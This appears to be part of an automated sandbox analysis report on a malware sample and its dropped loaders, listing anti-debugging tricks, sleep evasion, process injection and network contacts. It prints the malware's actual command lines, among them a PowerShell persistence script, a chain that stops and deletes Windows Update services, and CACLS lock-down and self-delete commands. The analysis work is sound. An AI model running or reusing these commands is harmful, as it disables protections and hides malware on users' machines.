Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF6768E9972 second address: 00007FF6768E99A1 instructions: 0x00000000 rdtsc 0x00000002 inc eax 0x00000003 rcr dh, FFFFFFDEh 0x00000006 pop esi 0x00000007 dec ecx 0x00000008 shl edi, cl 0x0000000a dec eax 0x0000000b cdq 0x0000000c pop ecx 0x0000000d dec ebp 0x0000000e movzx ecx, di 0x00000011 inc ecx 0x00000012 pop edi 0x00000013 inc ecx 0x00000014 pop ecx 0x00000015 inc dx 0x00000018 inc ecx 0x00000019 pop edx 0x0000001a dec eax 0x0000001b cwde 0x0000001c ror ebx, cl 0x0000001e pop ebp 0x0000001f adc al, DDh 0x00000021 popfd 0x00000022 bswap dx 0x00000025 inc esp 0x00000026 movsx esi, bp 0x00000029 inc ecx 0x0000002a pop eax 0x0000002b inc ecx 0x0000002c sete ah 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF675F42B33 second address: 00007FF675F42B4C instructions: 0x00000000 rdtsc 0x00000002 movzx edi, sp 0x00000005 inc ecx 0x00000006 pop esp 0x00000007 not dx 0x0000000a inc ecx 0x0000000b pop ebp 0x0000000c inc ecx 0x0000000d pop esi 0x0000000e inc ecx 0x0000000f pop ebx 0x00000010 dec eax 0x00000011 movsx eax, sp 0x00000014 pop edi 0x00000015 dec ecx 0x00000016 movzx ebx, cx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	RDTSC instruction interceptor: First address: 00007FF675F9FC76 second address: 00007FF675F9FC96 instructions: 0x00000000 rdtsc 0x00000002 pop ecx 0x00000003 inc ecx 0x00000004 pop edi 0x00000005 inc ecx 0x00000006 pop ecx 0x00000007 inc ebp 0x00000008 cmp al, bh 0x0000000a inc bp 0x0000000c bsr eax, edx 0x0000000f inc ecx 0x00000010 pop edx 0x00000011 inc esp 0x00000012 btr edx, esp 0x00000015 pop ebp 0x00000016 btr ebx, 44h 0x0000001a dec eax 0x0000001b btc edi, esi 0x0000001e popfd 0x0000001f lahf 0x00000020 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000106587EA second address: 0000000010658809 instructions: 0x00000000 rdtsc 0x00000002 ror cl, 1 0x00000004 ror edx, FFFFFF86h 0x00000007 xor ax, si 0x0000000a not cl 0x0000000c clc 0x0000000d xor bl, cl 0x0000000f push esi 0x00000010 push edi 0x00000011 rol dh, FFFFFF9Dh 0x00000014 rcl eax, cl 0x00000016 test bx, bx 0x00000019 push ebx 0x0000001a mov ebx, ecx 0x0000001c movsx eax, di 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	RDTSC instruction interceptor: First address: 0000000000A125FE second address: 0000000000A333CF instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 call 00007FB5AC944211h 0x00000008 call 00007FB5AC8E2A91h 0x0000000d mov dword ptr [esp+04h], 7A546ADEh 0x00000015 lea esp, dword ptr [esp+04h] 0x00000019 call 00007FB5ACA9592Ah 0x0000001e push edx 0x0000001f push eax 0x00000020 cmovnl eax, ebp 0x00000023 push ebp 0x00000024 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\timeout.exe TID: 5640	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5784	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6044	Thread sleep time: -50000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6048	Thread sleep time: -1440000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 6040	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe TID: 5784	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe TID: 2364	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5540	Thread sleep count: 9502 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856	Thread sleep time: -2767011611056431s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9502

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

API coverage: 3.2 %

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 50000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 360000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000002.376729200.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi0ymi0ma.wclwox4jcqzsnqbjvsl_=;
Source: gntuud.exe, 0000000D.00000003.367227251.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DQxttu2Qrr.exe	Binary or memory string: vmCi`
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: rundll32.exe, 00000018.00000003.368888031.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

Code function: 0_2_61E354D1 sqlite3_os_init,GetSystemInfo,

0_2_61E354D1

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

System information queried: ModuleInformation

Jump to behavior

Anti Debugging

Tries to detect debuggers (CloseHandle check)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Handle closed: DEADC0DE

Hides threads from debuggers

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\1000018002\avicapn32.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\1000018002\avicapn32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exe	Thread information set: HideFromDebugger

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugPort
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugObjectHandle
Source: C:\Users\user\1000018002\avicapn32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process queried: DebugPort

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe

System information queried: KernelDebuggerInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.3 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 85.209.135.109 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Section loaded: C:\Users\user\AppData\Local\Temp\jekppnay.tmp target: unknown protection: readonly

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 32F0000 protect: page read and write
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory allocated: C:\Windows\SysWOW64\fontview.exe base: 2D80000 protect: page read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Memory written: C:\Windows\System32\dialer.exe base: BE2470010
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: 400000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe base: DFD008
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 32F0000
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Memory written: C:\Windows\SysWOW64\fontview.exe base: 2D80000

.NET source code references suspicious native API functions

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ie.cs	Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, jb.cs	Reference to suspicious API methods: ('c', 'GetProcAddress@kernel32.dll'), ('a', 'LoadLibrary@kernel32.dll')
Source: 49.3.umciavi64.exe.f0d0000.0.unpack, ud.cs	Reference to suspicious API methods: ('nb', 'OpenProcess@kernel32.dll')

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

Thread register set: target process: 2240

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#qgoyddbo#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'rtkauduservice64.exe' /tr '''c:\users\user\locktime\rtkauduservice64.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\locktime\rtkauduservice64.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'rtkauduservice64.exe' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "rtkauduservice64.exe" /t reg_sz /f /d 'c:\users\user\locktime\rtkauduservice64.exe' }

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\ProgramData\61312899942613011832.exe "C:\ProgramData\61312899942613011832.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit	Jump to behavior
Source: C:\ProgramData\61312899942613011832.exe	Process created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 6	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y\|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Process created: unknown unknown

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation	Jump to behavior
